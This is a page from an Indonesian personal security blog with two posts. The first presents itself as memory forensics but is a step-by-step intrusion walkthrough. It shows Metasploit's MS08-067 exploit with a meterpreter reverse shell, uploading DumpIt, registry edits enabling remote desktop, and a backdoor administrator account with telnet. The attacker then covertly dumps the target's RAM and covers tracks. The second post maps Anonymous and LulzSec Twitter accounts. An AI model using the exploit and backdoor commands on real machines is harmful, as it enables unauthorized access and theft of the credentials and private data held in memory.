# ray16

wasted blog

# ray16 RSS Feed
 

Archive for analysis

Membuat Live RAW Image Random Access Memory (RAM) Pada Mesin Target Windows

pernah ada yang bayangin gak? di film film kita sering liat ada geng geng teroris hi tech, menggunakan flashdisk nyolokkin flashdisk di komputer target, lalu dengan cepatnya keluar dari TKP, dan menganalisa “file-entah-apa” yang di dump ke flashdisk tersebut di suatu tempat tersembunyi.

actually gw pernah membayangkan dan mencoba bagaimana sih seperti itu, dan apalagi gw ini bukan teroris seperti itu.

di security cabang spionase atau undercover seperti ini dengan mudah di pelajari dengan mengambil tahap pertama yaitu forensik, karena dengan melakukan forensik kita terbiasa dengan hal detail, lalu kita bisa hitung timing dan keperluan alat alat untuk melakukan forensik.

pada kali ini kita bahasa forensik Live RAM yang di dump pada satu file RAW, dengan bantuan tools Moonsols DumpIt.

Core Dumping / Memory Dumping / Storage Dumping adalah tekhnik untuk debugging sistem operasi secara offline, tanpa mengganggu kinerja sistem yang sedang berjalan, tipe dumping bisa bermacam macam, ada yang crash dumping, storage dumping dll.

So ini menjadi salah satu teknik forensik, di bidang security, dimana jika seseorang attacker ingin menganalisa sistem operasi target namun tidak mempunyai waktu yang cukup, maka core dumping biasa dilakukan untuk menganalisa sistem operasi yang sedang berjalan pada target di tempat lain.

Moonsols DumpIt

This utility is used to generate a physical memory dump of Windows machines. It works with both x86 (32-bits) and x64 (64-bits) machines.
The raw memory dump is generated in the current directory, only a confirmation question is prompted before starting.
Perfect to deploy the executable on USB keys, for quick incident responses needs.

seperti yang ditulis msuiche pada blog moonsols, DumpIt di release karena banyaknya yang melakukan forensik pada memory windows terbatas pada tools yang tersedia di publik, beda nya executable setiap arsitektur processor, serta tidak ada yang praktis.

DumpIt hanya satu file aplikasi executable, tanpa .ini atau file pendukung lainya, penggunaan nya hanya 1 click lalu hanya ada satu konfirmasi, yaitu yes (y) atau tidak (n).

begitu yes maka DumpIt akan melakukan dumping live RAM Memory ke dalam satu file, dalam direktori DumpIt.exe itu sendiri, sehingga DumpIt sangat cocok untuk ditaruh ke dalam USB Flashdisk Kosong.

besar file yang di dump adalah besar dari exact memory size, dimana jika RAM target sebesar 4GB, maka DumpIt akan membuat file dumping sebesar 4GB.

ada dua skenario attack pada kasus dumping memory untuk forensik, ialah :

Attacker membawa DumpIt ke satu flashdisk kosong, lalu bertemu dengan target, meminjam komputer windows tersebut, lalu mendumping live RAM Memory si target, Attacker mendapatkan file RAW dari Live RAM memori target lalu menganalisa nya di rumah.

Attacker melakukan penetrasi dari local network dengan metasploit, dengan cara cara :

# Enumeration

msf > ping -c 1 192.168.1.106
[*] exec: ping -c 1 192.168.1.106

PING 192.168.1.106 (192.168.1.106) 56(84) bytes of data.
64 bytes from 192.168.1.106: icmp_seq=1 ttl=128 time=114 ms

msf > nmap -p 445 192.168.1.106
[*] exec: nmap -p 445 192.168.1.106

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-06 11:09 WIT
Nmap scan report for 192.168.1.106
Host is up (0.00098s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 08:00:27:15:05:2E (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

# Penetration

msf > use exploit/windows/smb/ms08_067_netapi 
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.106
RHOST => 192.168.1.106
msf  exploit(ms08_067_netapi) > set LHOST 192.168.1.109
LHOST => 192.168.1.109
msf  exploit(ms08_067_netapi) > exploit -f

[*] Started reverse handler on 192.168.1.109:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.106:1033) at 2012-02-06 08:26:21 +0700

# Upload DumpIt.exe

meterpreter > upload /root/gw/gear0wn/DumpIt/DumpIt.exe C:\

# Preparing service backdoor

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

# Set registry new value

meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections -t REG_DWORD -d 1
meterpreter > reg setval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections -t REG_DWORD -d 0

# Check registry value

meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v AllowTSConnections
meterpreter > reg queryval -k 'HKLM\system\CurrentControlSet\Control\Terminal Server\' -v fDenyTSConnections

# Restart telnet server

meterpreter > execute -f cmd.exe -i
Process 4004 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\ANONYMOUS

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant            
idiot                    SUPPORT_388945a0         
The command completed successfully.

C:\WINDOWS\system32>

C:\Windows\system32\>tlntsvr.exe start 
C:\Windows\system32\>net user gxrg let_us_in /add
C:\Windows\system32\>net localgroup Administrators gxrg /add
C:\Windows\system32\>sc config TermService start= auto
C:\Windows\system32\>net start Termservice
C:\Windows\system32\>sc config tlntsvr start= auto
C:\Windows\system32\>net start tlntsvr

Running Telnet ke mesin target, login sesuai user yang telah baru dibuat, lalu jalankan DumpIt, dan pencet y, lalu enter, tunggu beberapa saat, file raw akan dibuat, dan copy ke mesin attacker RAW tersebut, lalu delete user yang telah dibuat, dan logout meterpreter dengan smoothly :).

*dibutuhkan Telnet Server karena, NC dan default shell windows pada meterpreter suck tidak bisa menjalankan DumpIt, dikarenakan interface kedua tools tsb.

Artikel lanjutan dari ini akan ditulis, yaitu analisa forensik RAW Memory dari hasil Dumping.

Good Luck! ;p.

Forensic dan Hacking Twitter: Men-visualisasikan Komunitas Hacker

Hi there, ini gw ada artikel bagus dari https://sites.google.com/site/valkyriexsecurityresearch/blog/hackingtwittervisualizehackingcommunities, gw terjemahin ke Bahasa Indonesia, so lo lo semua dan terkhusus gw bisa jadiin ini sebagai panduan forensik aku twitter.

—————————————————————————–

Hari ini adalah Tahun baru Cina, Saya ingin mewakili VXRL untuk mengatakan “Kung Hei Fat Choy” untuk Anda semua.

Sekarang sedang ngetop ngetop nya dua hacking tim, Lulzsec dan Anonymous, yang dimana mereka memberi tau setiap kegiatan mereka lewat Twitter. Saya penasaran apa saja yang dilakukan mereka, dan siapa saja yang menjadi koneksi mereka, dan saya akan membahasnya secara snapshot.

Jaringan Retweet
Saya mulai dengan membuat program Python, lalu melakukan 100 request ke Twitter menggunakan Twitter API.

Menariknya, dari grafik Lulzsec, saya telah menemukan sejumlah kelompok yang sama / berkorelasi dengan Anonymous dan secara eksplisit yang menyatakan bahwa itu berasal dari Inggris, Swedia dan beberapa Bot IRC, saya percaya itu baik bagi mereka untuk memastikan tindakan mereka dan berita berhasil disebarkan, apalagi jika Twitter menutup salah satu dari rekening mereka, sementara itu, saya bisa menebak kekuatan utama mereka (atau sukarelawan?) berasal dari Eropa.

Akun-akun twitter yang mendukung Anonymous (mungkin dimiliki oleh mereka atau sukarelawan) meliputi:
– YourAnnoNews
– AnonOpsSweden
– AnonOpsBrazil
– AnonymousIRC
– BritAnonymous
– AnonymousBrazil
– AnonymousOnly

Dari grafik yang ada, menunjukkan kalo AnonOpeSweden bertindak sebagai team inti, karena AnonOpsSweden di follow oleh setiap anggota / team / grup.

Sementara LulzSec, meliputi:
– LulzSec
– LulzSec47
– LulzSecBrazil

Hal ini cukup menarik bahwa selain Eropa, kita bisa menemukan kelompok-kelompok dari Brasil mendukung kedua LulzSec dan Anonymous. Apakah berarti operasi besar berada di Brasil juga? :)

Liat gambar: Korelasi Kegiatan antara Anonymous & LulzSec

Gambar berikut menunjukkan, bahwa hampir dari semua anggota Anonymous memfollow AnonOpsSweden

Gambar diatas menunjukkan Lulzsec dan Anonymous mempunyai hubungan kedekatan.

Penjelasan Lebih Lanjut.

Saya akan membuat jalur AnonOpsSweden. Saya mendapatkan 2 twitter account lagi yang menarik, AnonCentral dan AnonyOps, yang menunjukan bahwa “Anonymous ada di semua tempat”.

Gambar diatas menunjukkan adanya akun twitter baru.

Topik menarik lainnya.

Baiklah, ini adalah pembahasan utama, dan perkiraan apa yang akan dilakukan oleh mereka? Saya membuat simple query dengan kata kunci “DDoS” dengan menggunakan Python.

>>> import twitter
>>> import json
>>> twitter_search = twitter.Twitter(domain="search.twitter.com")
>>> search_results = []
>>> search_results = twitter_search.search(q="DDoS")
>>> print json.dumps(search_results, sort_keys=True, indent=1)

Dengan mudahnya saya menemukan konversasi dengan kata kunci “DDoS” dengan hasil hingga 2345 pada 23 Jan 2012 (HKT), Hemm mereka nampaknya sudah mempunyai sukarelawan untuk melakukan DDoS Attack.

Sebagai seorang pengamat, itu bagus bagi kita untuk memiliki tindakan terbaru mereka dan juga rencana terbaru mereka, saya menghargai pola pikir Anonymous dan Lulzsec untuk mengubah pola pikir orang lain untuk membuat keamanan yang lebih baik, tapi bisa kita gunakan maksud lain? Namun, ini adalah dilema, etika dan keadilan terlihat seperti itu tidak dapat seimbang dalam dunia nyata, beberapa tugas memang harus diserahkan kepada para hacker.

Enjoy it ;-)